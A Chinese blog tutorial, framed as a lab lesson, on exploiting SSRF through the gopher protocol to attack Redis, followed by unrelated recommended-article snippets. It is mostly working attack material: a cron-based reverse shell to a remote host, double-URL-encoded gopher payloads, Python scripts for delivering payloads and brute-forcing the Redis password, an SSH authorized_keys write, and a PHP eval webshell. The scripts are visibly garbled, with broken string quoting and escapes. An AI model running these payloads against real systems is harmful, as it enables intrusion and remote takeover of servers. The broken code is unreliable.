jfinal获取url链接上面传来的string类型的值_SSRF漏洞攻击Redis-从零到获取Shell(脚本+视频)...

最新推荐文章于 2024-06-28 16:10:48 发布
最新推荐文章于 2024-06-28 16:10:48 发布
阅读量1.1k 收藏
点赞数
文章标签: jfinal获取url链接上面传来的string类型的值 shell 查某个字符串 windows 弹shell

56bc25988cecc99bbbb9ffd5b2f84d57.png

!!!文末有视频讲解!!!

一、本节课程需要的主机

  1. Kali2.0
  2. Windows Server2003

二、本节课需要的工具

  • Redis
  • nc
  • wireshark
  • tcpdump
  • python2.7
  • docker

三、文章目录

  • 0x01 Redis基础
  • 0x02 Redis入侵,反弹shell
  • 0x03 Redis认证攻击
  • 0x04 写ssh-keygen公钥,使用私钥登陆
  • 0x05 写webshell

0x01 Redis基础

一、Redis定义

REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。
Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。 ----摘自runoob

二、Redis安装

在开始之前建议先学习下Redis的基础知识:Redis基础知识,会事半功倍。

安装以Kali2.0为例,安装前需要更新源以及软件列表,参考链接:更改Kali源
安装如步骤如下:
1、安装redis

apt-get install redis-server

2、修改redis监听IP(如果不修改,不可远程登录),IP需要替换为自己的IP

vim /etc/redis/redis.conf
# 修改为以下内容
bind 127.0.0.1 192.168.0.67

3、启动redis服务

service redis-server start

0x01 Redis入侵,反弹shell

在开始讲攻击Redis之前,必须要理解Redis的客户端和服务端的通信方式,以及数据发送的格式,该目的的实现需要tcpdump的抓包功能。使用抓包软件来查看Redis客户端和Redis服务端的通信数据,找到语法结构后开始模拟客户端发送数据。

a1da891dd12d149d9f5a56c7946bef6a.png
抓取redis通信


1、使用tcpdump来完成抓包,命令如下:

tcpdump -i eth0 port 6379 -w redis.pcap
参数说明如下:(更多tcpdump的教程,参考[Tcpdump教程](https://www.runoob.com/linux/linux-comm-tcpdump.html))
-i:指定网卡为eth0
port:指定抓哪个端口的数据
-w:将流量包保存为文件

2、使用Redis客户端登录Redis服务端,命令如下(默认无密码):

root@Kali-2018:~/tmp# redis-cli -h 192.168.0.119 -p 6379
192.168.0.119:6379> get a
(nil)
192.168.0.119:6379>

以上命令做了一个获取a对应的值是多少的操作,现在我们使用wireshark看一下抓到的包(使用追踪流-TCP流):

上面非常多的内容就不放了
*2
$3
get
$1
a
-1

如果不理解Redis的数据发送的数据包格式,是看不懂上面内容的,这里必须要讲这么几个内容:2.1、序列化协议:客户端-服务端之间交互的是序列化后的协议数据。在Redis中,协议数据分为不同的类型,每种类型的数据均以CRLF(rn)结束,通过数据的首字符区分类型。2.2、inline command:这类数据表示Redis命令,首字符为Redis命令的字符,格式为 str1 str2 str3 …。如:exists key1,命令和参数以空格分隔。2.3、simple string:首字符为'+',后续字符为string的内容,且该string 不能包含'r'或者'n'两个字符,最后以'rn'结束。如:'+OKrn',表示”OK”,这个string数据。2.4、bulk string:bulk string 首字符为'$',紧跟着的是string数据的长度,'rn'后面是内容本身(包含’r’、’n’等特殊字符),最后以'rn'结束。如:

"$12rnhellornworldrn"

上面字节串描述了 “hellornworld” 的内容(中间有个换行)。对于" "空串和null,通过'$' 之后的数字进行区分:

"$0rnrn" 表示空串;
"$-1rn" 表示null。

2.5、integer:以 ':' 开头,后面跟着整型内容,最后以'rn'结尾。如:":13rn",表示13的整数。2.6、array:以'*'开头,紧跟着数组的长度,"rn" 之后是每个元素的序列化数据。如:"*2rn+abcrn:9rn" 表示一个长度为2的数组:["abc", 9]。数组长度为0或 -1分别表示空数组或 null。
数组的元素本身也可以是数组,多级数组是树状结构,采用先序遍历的方式序列化。如:[[1, 2], ["abc"]],序列化为:"*2rn*2rn:1rn:2rn*1rn+abcrn"。
3、经过上面内容的讲解,在回过头理解抓到的redis的包就很容易明白了。

上面非常多的内容就不放了
*2 数组长度为2
$3 bulk string,代表字符串长度为3,就是get
get 普通字符
$1 bulk string,代表字符串长度为1,就是a
a 普通字符
-1 返回内容,-1代表null

明白以上内容后基本就理清了思路,如果要给redis发命令,按照他的序列化规则即可。现在有一个大胆的想法,如果我用gopher去执行redis的命令呢?为了实现我们的想法,我们在Redis中加一个key,名字为name,值为Margin。命令如下:

set name Margin

此时,我们使用curl来发起gopher的请求,如下:

curl gopher://192.168.0.119:6379/_*2
$3
get
$4
name

将其转化为url编码

curl gopher://192.168.0.119:6379/_%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%34%0d%0a%6e%61%6d%65%0d%0a

执行结果如下

margine:~ margin$ curl gopher://192.168.0.119:6379/_%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%34%0d%0a%6e%61%6d%65%0d%0a
$6
Margin

那如果是在web漏洞中呢?如何利用?经过上一节课《Gopher协议在SSRF漏洞中的深入研究》内容可以很容易的联想到使用方法:

1、构造利用代码
2、url转码
3、再次url转码

web环境我们还是使用上一节课的代码(curl_exec.php),代码如下:

<?php
$url = $_GET['url'];
echo $url;
#var_dump(curl_version());
$curlobj = curl_init($url);
echo curl_exec($curlobj);
?>

最终构造利用代码为:

http://192.168.0.109/ssrf/base/curl_exec.php?url=gopher%3a%2f%2f192.168.0.119%3a6379%2f_%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%37%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61

但使用curl请求后一直卡顿,没有任何回显,无比绝望,我的排查思路为下:

1、查看web日志,是否有错误日志(发现并没有)
2、在执行curl_exe函数前,加上exit()函数,这样我便能判断http请求是否到后台代码了(结果可以)
3、查看redis的命令执行记录(接下来讲这个)

在Linux命令行中执行以下命令来查看Redis命令执行记录:

redis-cli -h 127.0.0.1  monitor

执行结果为下图,说明redis接收到了来自gopher的请求,但没有命令回显,为什么?(需要在命令后面加QUIT,后面会用到)。

b2247b1034802a19cca844d91da854b2.png


虽然无法回显命令执行的结果,但是命令确实是执行了,接下来测试下反弹shell(没有用上面讲的redis的数据包格式,下面的格式也可以),命令如下:

set mars "nnnn* * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1nnnn"
config set dir /etc/
config set dbfilename crontab
save

上述命令的含义总结为,利用Redis的备份功能,将crontab的定时任务备份到/etc/crontab中,起到执行命令的效果,因为Linux会监测/etc/crontab的内容,当我们将反弹shell的命令加入进去后,变会被执行,具体解释如下:

# 添加名为mars的key,值为后面反弹shell的语句,5个星号代表每分钟执行一次,开始和技术的n必须要有一个,也就是前后各有一个,当然,多个可以,主要是为了避免crontab的语法错误。crontab知识可以参考:【https://www.runoob.com/w3cnote/linux-crontab-tasks.html】
set mars "nnnn* * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1nnnn"
# 设置备份的路径为/etc
config set dir /etc/
# 设置备份文件名为crontab
config set dbfilename crontab
# 开始备份
save

进行二次URL编码,结果如下:

http://192.168.0.109/ssrf/base/curl_exec.php?url=gopher%3a%2f%2f192.168.0.119%3a6379%2f_%25%30%64%25%30%61%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%32%30%25%36%64%25%36%31%25%37%32%25%37%33%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%30%25%32%65%25%33%31%25%33%31%25%33%39%25%32%66%25%33%39%25%33%39%25%33%39%25%33%39%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%36%33%25%37%32%25%36%66%25%36%65%25%37%34%25%36%31%25%36%32%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61

执行结果如下,1分钟后发现成功反弹shell。

9999
ls
bash: no job control in this shell

简易脚本如下:

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib

url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.119:6379/_"
# 攻击脚本,n的一定要转义
"set mars "n* * * * * root bash -i >& /dev/tcp/192.168.0.119/6670  0>&1n"
config set dir /etc/
config set dbfilename crontab
save
"""

def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

# 二次编码
encoder = encoder_url(encoder_url(data))

# 生存payload
payload = url + urllib.quote(gopher,'utf-8') + encoder

# 发起请求
request = urllib2.Request(payload)
response = urllib2.urlopen(request).read()

0x03 Redis认证攻击

以上为Redis未授权访问攻击,但如果Redis设置了密码呢?
如果要执行命令的话,必须要有密码才可以,所以接下来的问题便是如何破解Redis的密码,首先想到的暴力破解。此时要研究下Redis如何验证身份信息。方法还是抓包,抓到认证的流量,重放即可。抓包发现:

*2
$4
auth
$6
Margin

可以翻译为认证命令为auth xxxx
那么我们将redis的密码改为任意密码,我设置为Margin

config set requirepass Margin

将请求包改为

auth Margin
quit

python代码变为

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib

url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.119:6379/_"

def get_password():
    f = open("password.txt","r")
    return f.readlines()

def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder



for password in get_password():
    # 攻击脚本
    "auth %s
    quit
    """ % password
    # 二次编码
    encoder = encoder_url(encoder_url(data))
    # 生存payload
    payload = url + urllib.quote(gopher,'utf-8') + encoder

    # 发起请求
    request = urllib2.Request(payload)
    response = urllib2.urlopen(request).read()
    if response.count("+OK") > 1:
        print "find password : " + password

所以,在已知密码的情况下可以将攻击的python代码中加入认证的语句,如下:

auth Margin
set mars "n* * * * * root bash -i >& /dev/tcp/192.168.0.119/6671  0>&1n"
config set dir /etc/
config set dbfilename crontab
save

再次运行python脚本,便可成功反弹shell。

0x03 写ssh-keygen公钥,使用私钥登陆

在上面的内容中描述了如何使用Redis的数据备份执行命令,接下来讲解通过写入ssh-keygen公钥,使用私钥登录。思路还是利用备份,将私钥字符串备份到目标服务器.ssh目录下。
要完成此操作,需要两个前提条件

  • Redis服务使用ROOT账号启动(可以临时执行sudo -u root /usr/bin/redis-server /etc/redis/redis.conf 来以root权限运行)
  • 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。

首先在本地生成一对密钥

ssh-keygen -t rsa
margine:.ssh margin$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/Users/margin/.ssh/id_rsa):  
/Users/margin/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /Users/margin/.ssh/id_rsa.
Your public key has been saved in /Users/margin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:QKUmi/y9Tu27soIg2+rRrvDO16sQBnrSCzkVx4RcTSw margin@margine.local
The key's randomart image is:
+---[RSA 2048]----+
| ..=++o..        |
|  ooE.o.         |
|. . ..+          |
|.* . + .         |
|* B .   S        |
|o*.+ . .         |
|o=oo..o .        |
|oo=.o.oo         |
|o==o.+=++o       |
+----[SHA256]-----+

查看密钥的字符串,一会使用Redis的备份功能,将密钥字符串传到目标服务器。

margine:.ssh margin$ cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.local

构造payload,如下:

config set dir /root/.ssh/
config set dbfilename authorized_keys
set margin "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.local"
save
quit

进一步得到python代码为:

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib

url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.67:6379/_"

# 攻击脚本
"config set dir /root/.ssh/
config set dbfilename authorized_keys
set margin "nnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.localnn"
save
quit

"""

def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

# 二次编码
encoder = encoder_url(encoder_url(data))

print encoder
# 生存payload
payload = url + urllib.quote(gopher,'utf-8') + encoder

# 发起请求
request = urllib2.Request(payload)
response = urllib2.urlopen(request).read()
print response

0x04 写webshell

经过上面文章的学习,对于写webshell来说便变得非常简单,要完成此操作,需要两个前提条件

  • 当前运行redis的用户在web目录有写权限
  • 知道web目录的绝对路径

步骤比较简单,原理还是利用Redis的备份功能,只不过这次是备份成webshell(redis所在的服务器需要phpstudy环境,参考Linux下phpstudy安装
修改python中的payload,如下:

"config set dir /var/www/html/
config set dbfilename margin.php
set margin "n<?php eval($_POST['margin']);?>n"
save
quit

"""

此处不贴完整的python代码了,执行后可以看到目标主机有了margin.php文件,使用菜刀连接即可。

到此文章结束。
感谢各位支持,原创不易,记得点赞。记得看下方视频。

6f3c6b6ba2eece59918e478c43da2333.png
SSRF漏洞攻击Redis并获取shellhttps://www.zhihu.com/video/1222998712152088576
weixin_39951018
关注
jfinal对xss漏洞的处理
huangbaokang的博客
12-11 790
在我们的jfinal配置类当中,配置自定义Handler public void configHandler(Handlers handler) { //handler.add(我们自定义handler的实例) handler.add(new XssHandler()); } 新建XssHandler类,继承com.jfinal.handler.Handler public class XssHandler extends Handler{ @Overr
Jfinal CMS命令注入漏洞
MoLeft's Blog
12-21 1898
如果后台存在任何文件上传漏洞,则可以将此文件替换为包含payload的文件,以触发 fastjson 反序列化。来解析文件内容,这里的文件内容是可控的,只需将文件内容替换为payload即可。登录后台,找到模板管理,后台默认账号密码admin/admin123456。在 kali 上运行该工具,启动 rmi 和 ldap 服务。替换payload中的rmi或ldap地址,然后保存到。测试中使用的JDK版本:JDK8u101。jfinal_cms版本:5.0.1。类的构造方法中实例化。
Jfinal cms前台评论XSS漏洞分析
weixin_30535043的博客
05-14 552
Jfinal cms采用Java语言开发,官方代码仓库为:https://gitee.com/jflyfox/jfinal_cms。 Jfinal cms前台评论处存在XSS漏洞,以v4.6版本为例,下面是简单的漏洞分析。 首先来看如何利用此漏洞。 第一步:填写payload 在新闻评论的地方填写如下payload:abcd<img src="/xswv.png" onerror="...
jfinal 检测到目标URL存在http host头攻击漏洞的解决方法
qq_41182238的博客
04-30 686
记录编写handler 来对此漏洞进行修复 编写handler 来对此漏洞进行修复 注:JFinal的 Handler是 AOP + 责任链 模式的一个变种,JFinal对action及interceptor处理自身也是一个Handler名叫ActionHandler,可见其功能之强大。平时开发的时候一般不需要使用,当Action与Interceptor还不够用的时候可以考虑Handler上场。另...
JFinalcms 5.0.0代码审计(1)
最新发布
weixin_44513407的博客
06-28 754
JFinalcms代码审计
jfinal-jfinal-master.zip_Java 8_cos-26Dec2008_cos-26Dec2008.pom_
09-14
一、在本地安装部分 jar 包 由于在 maven中心库中未找到jetty-server-8.1.8.jar 与 cos-26Dec2008.jar, 需要先使用如下命令将这两个 jar 包安装在本地 maven 库中 安装 jetty-server-8.1.8.jar ...
jfinal_demo_for_maven.zip_DEMO_JFinal crud_JFinal 项目_jfinal_jfin
09-23
总结来说,"jfinal_demo_for_maven.zip_DEMO_JFinal crud_JFinal 项目_jfinal_jfin" 提供了一个使用 Maven 构建的 JFinal 示例项目,涵盖了数据库 CRUD 操作的核心功能。这个项目不仅展示了 JFinal 框架的高效性和...
jfinal-4.9.01_demo_for_maven.zip
11-23
JFinal 4.9.01 极速开发实战:构建Maven项目》 JFinal,作为国内一款优秀的Java Web开发框架,以其简洁、高效的特性深受开发者喜爱。本资源"jfinal-4.9.01_demo_for_maven.zip"提供了一个基于Maven构建的JFinal...
jfinal-4.9.17-bin-with-src.jar 附带源码 方便调试 阅读
09-23
jfinal-4.9.17-bin-with-src.jar 附带源码 方便调试 阅读
jfinal-4.9.01-all.zip
09-16
从官网下载,放CSDN加速下载不等待,jfinal最新版本功能扩展依赖包。 JFinal 是基于 Java 语言的极速 WEB + ORM + AOP + Template Engine 框架,其核心设计目标是开发迅速、代码量少、学习简单、功能强大、轻量级、...
jfinal_sql注入问题解决
weixin_30566063的博客
03-01 877
sql注入(百度的): 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1] 比如先前的很多影视网站泄露...
ssrf dict MySQL_ssrf漏洞利用(内网探测、打redis)
weixin_35678674的博客
02-22 1169
摘要:存在ssrf漏洞的站点主要利用四个协议,分别是http、file、gopher、dict协议。file协议拿来进行本地文件的读取,http协议拿来进行内网的ip扫描、端口探测,如果探测到6379端口,那么可以利用http、gopher、dict这几个协议来打开放6379端口的redis服务(一般开放了这个端口的是redis服务),原理是利用他们以目标机的身份执行对开启redis服务的内网机执...
redis更改config set dir后save报错问题解决 报错为: Failed opening .rdb for saving: Read-only file system
weixin_45805993的博客
12-16 2340
Stack Overflow牛批,CSDN上找了一周都找到解决办法 具体来说就是要改/etc/systemd/system/redis.service这个配置文件 这个配置文件中有一些关于redis允许读和写的目录,把你想允许他写的目录放在ReadWriteDirectories=后面就好了 其次权限给满,能想到的都给777 像/etc/redis /var/lib/redis, 再加root启动应该 就行了!! 参考链接https://stackoverflow.com/questions/44814.
SSRF漏洞内网渗透利用(实例)
墨痕诉清风的博客
10-07 6359
目录 常出现的位置 绕过方式 正则过滤指定网址 内网IP地址绕过(不容许172、10、192开头的地址均不许输入) 常见的攻击协议 实例:ssrf漏洞利用(内网探测、打redis) 一、进行内网探测 二、file协议读取文件 三、攻击redis 方法一:通过header CRLF 注入 方法二:通过【curl命令】和【gopher协议】远程攻击内网redis 方法三:使用dict协议向Redis数据库写shell Payload 完善修改 四、结合gopher协...
jfinal框架中防跨站脚本XSS攻击
志全的博客
07-27 1040
跨站脚本攻击(XSS) Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 问题解决: 对于Jfinal轻量级框架解决方式从框架根本从特殊字符转义入手。 1、处理器配置初始化 public void configHandler(Handlers me) { XssHandler xssHan...
jfinal xss过滤以及url注入漏洞的问题
qq_41182238的博客
04-29 1313
这里参考jfinal社区的xss处理方式这里简单记录一下。 1.首先:创建XssHandler 代码如下: package com.gdszgl.common.handler; import com.jfinal.handler.Handler; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.Http...
Jfinal处理XSS漏洞
u013808315的专栏
04-25 2070
创建BaseController继承Jfinal自带的Controller,并供所有业务controller继承。BaseController中重写Controller的getPara(String)方法/** * 重写getpara,处理XSS漏洞 */ @Override public String getPara(String name) { // TODO Au...
JFinal 如何进行XSS过滤(JFinal 的简单介绍到利用JFinal 的handler实现)
Oneask的博客
12-21 5678
JFinal 如何进行XSS过滤(JFinal 的简单介绍到利用JFinal 的handler实现)
通过HttpServletRequestWrapper(装饰模式的应用)增强HttpServletRequest的功能
万里征程初试马,百年伟业乐为牛!
10-08 392
应用一:解决tomcat下中文乱码问题(先来个简单的)  在tomcat下,我们通常这样来解决中文乱码问题:   过滤器代码: package filter; import java.io.*; import javax.servlet.*; import javax.servlet.http.*; import wrapper.GetHttpServletRequestWra...
jfinal自增Db.save获取自增主键id
12-14
JFinal 中,我们可以通过 `Db.save()` 方法向数据库中插入一条记录,并且获取该记录的自增主键 id。具体实现方式如下: 1. 首先,我们需要在数据库表中设置自增主键,例如: ```sql CREATE TABLE user ( id ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值